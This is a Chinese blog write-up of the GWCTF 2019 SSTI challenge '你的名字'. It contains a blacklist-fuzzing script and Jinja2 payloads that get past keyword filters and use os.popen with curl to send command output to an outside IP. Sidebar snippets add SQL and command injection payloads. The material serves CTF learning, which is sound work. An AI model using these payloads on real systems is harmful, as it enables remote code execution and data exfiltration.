[GWCTF 2019]你的名字

最新推荐文章于 2023-03-22 19:00:38 发布
最新推荐文章于 2023-03-22 19:00:38 发布
阅读量1.3k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107632225
版权

题目
image.png
过程
1.在 ssti 中过滤了后, 可以通过{%外带
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %}
由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。
只要在其他语句加入他,那么就可以绕过其他语句了。
但是不知道他得blacklist顺序。
写脚本测一下

import re
import requests
from time import sleep
url = "http://f9fd3c30-c575-4a29-88a3-680ebc168df5.node3.buuoj.cn"
def gen_words():
    f = open("ssti_payload.txt", "r").read()
    words = re.findall("[a-zA-Z]+", f)
    f = open("ssti_word.txt", "w")
    res = sorted(list(set(words)))
    for i in res:
        f.write(i + "\n")
    return res

def find_unused_word(words, payload):
    used_word = list(set(re.findall("[a-zA-Z]+", payload)))
    return [i for i in words if i not in used_word]

def fuzz():
    payload = "{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=`ls /`') %}1{% endif %}"
    words = gen_words()
    unused_word = find_unused_word(words, payload)
    for i in unused_word:
        data = {
            "name": i
        }
        res = requests.post(url, data=data).text
        if "hello !" in res:
            data = {
                "name": "cla" + i + "ss"
            }
            res = requests.post(url, data=data).text
            if "class" in res:
                print(f"[*] find {i}")
        sleep(0.1)

if __name__ == "__main__":
    fuzz()

用了他的脚本进行黑箱测试。
发现config可用。
那么使用config来跑。
需要开靶机利用curl来带回数据。
类似反弹shell?
使用自己的靶机进行RCE即可。
最终payload:

{% iconfigf ''.__claconfigss__.__mrconfigo__[2].__subclaconfigsses__()[59].__init__.func_gloconfigbals.linecconfigache.oconfigs.popconfigen('curl http://174.0.167.222:2333/ -d `ls /|base64`') %}1{% endiconfigf %}

深度学习
https://xz.aliyun.com/t/6885#toc-4Python

浩歌已行
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GWCTF 2019]你的名字 - SSTI注入(waf绕过)
oZuoShen123的博客
10-10 258
分析 1、页面只有一个输入框,输入什么回显什么 2、根据特性应该是SSTI注入 解题 fuzz:过滤则长度1512 过滤:{{}}、class、mro、builtins、file、func_globals、import、args、eval、for、if、config、popen(将open过滤) 绕过:{{}}用{%print%}、关键字要么用attr(‘cla’'ss’)|attr(‘base’)形式绕过、要么用['__clas'+'s__']形式绕过、要么用clconfigass形式绕
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1557
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
BUUCTF之“wustctf2020_name_your_dog”
Probeginner的博客
12-22 169
利用两次输入覆盖got.plt表间接执行后门函数
DES加密、DES解密、AES加密、AES解密
06-26
个人例子,VS2013,DES加密、DES解密,AES加密,AES解密,
el函数的使用文档
07-09
该文档主要包括一些el函数的简单使用说明.
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3353
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
buu刷题(4)
qq_62046696的博客
03-22 523
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3238
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
buu Crypto学习记录(7) password
EMsheep的博客
11-27 501
题目链接:https://buuoj.cn/challenges#password 姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} flag:zs19900315
re学习笔记(39)BUUCTF-re-[GWCTF 2019]xxor
逆向随笔
02-20 1654
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目链接:[GWCTF 2019]xxor xorm[0] = 3746099070, xorm[1] = 550153460, xorm[2] = 3774025685, xorm[3] = 1548802262, xorm[4] = 2652626477, xorm[5] = 2230518816 ...
BUUCTF 面具下的flag
Hrain7的博客
11-10 862
x 代表解压缩文件,并且是按原始目录树解压(还有个参数 e 也是解压缩文件,但其会将所有文件都解压到根下,而不是自己原有的文件夹下)解压压缩包,是flag.vmdk,当时卡到这儿了,不知道接下来怎么做了,然后看了网上的wp,说是7z可以解压vmdk文件。压缩源文件数据区是无加密的,然而压缩源文件目录区是加密的,所以可判断为是伪加密。-o 是指定解压到的目录, -o后是没有空格的,直接接目录。key_part_one文件夹里是Brainfuck加密。命令:7z x 需要解压的文件名 -r -o./
BUU刷题记录——5
weixin_43610673的博客
09-21 1469
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
CTF题库>实验吧>女神 (猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag))
qq_42777804的博客
08-18 933
下载后解压得到 直接用notepad++ 打开 nvshen.txt 可以看出来应该是 base64加密过的 1.直接进行解密 (notepad居然带有解密工具) (记得要全选中才行) 得到了 png开头的好多字符串 2.将文件另存为 .png 打开看看 居然不认识 尴尬ing 3.百度识图 哈哈哈哈 直接拖进去 ...
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 3262
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
SSTI注入,简单记录一下(config)
a3320315的博客
01-28 2494
输入数据有回显,看返回头是python写的后台,猜测有SSTI(加了个php模式的报错和index.php路由不知道有没有骗到某个师傅–) 然后接下来是绕WAF,我写了两个过滤,一个强过滤是匹配{{和}},目的是想让各位师傅用远程SSTI把flag打到自己服务器上。 然后是一个简单的单词匹配过滤os等敏感字符,只要FUZZ一下,再实验一下,会找到config这个大多数poc都用不上且过滤排在较后,...
BUUCTF--[羊城杯 2020]Easyphp2
qq_46263951的博客
08-18 1276
进入后的页面 根据题目提示我们可以知道这是一道PHP代码审计的题 所以使用伪协议查看源代码,这里使用的是两次url编码绕过 /?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php <!DOCTYPE html> &lt
广东外语外贸大学第三届网络安全大赛Writeup
SkYe's Blog
12-09 915
广东外语外贸大学第三届网络安全大赛Writeup 官方WP:https://github.com/gwht/2019GWCTF/tree/master/ Msic math 是男人就下150层嘛,也就是答对150次计算题就返回 flag 嘛。这道题与 pwnable.kr 的一道题很像。题目有作答时间限制,所以用脚本跑吧。可能是人品问题,跑了很多次,最好的就是回答到 147 之后就链接断了(垃...
[GWCTF2019]huyao
最新发布
07-28
\[GWCTF2019\]huyao是一个CTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,它可能涉及到频域盲水印隐写。具体的解题方法和细节需要参赛者在比赛中进行分析和解决。 #### 引用[.reference_title] - *1* [BUUCTF MISC刷题笔记(三)](https://blog.csdn.net/weixin_45696568/article/details/116421340)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [BUUCTF misc 解题记录 二(超级详细)](https://blog.csdn.net/qq_51090016/article/details/115712647)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值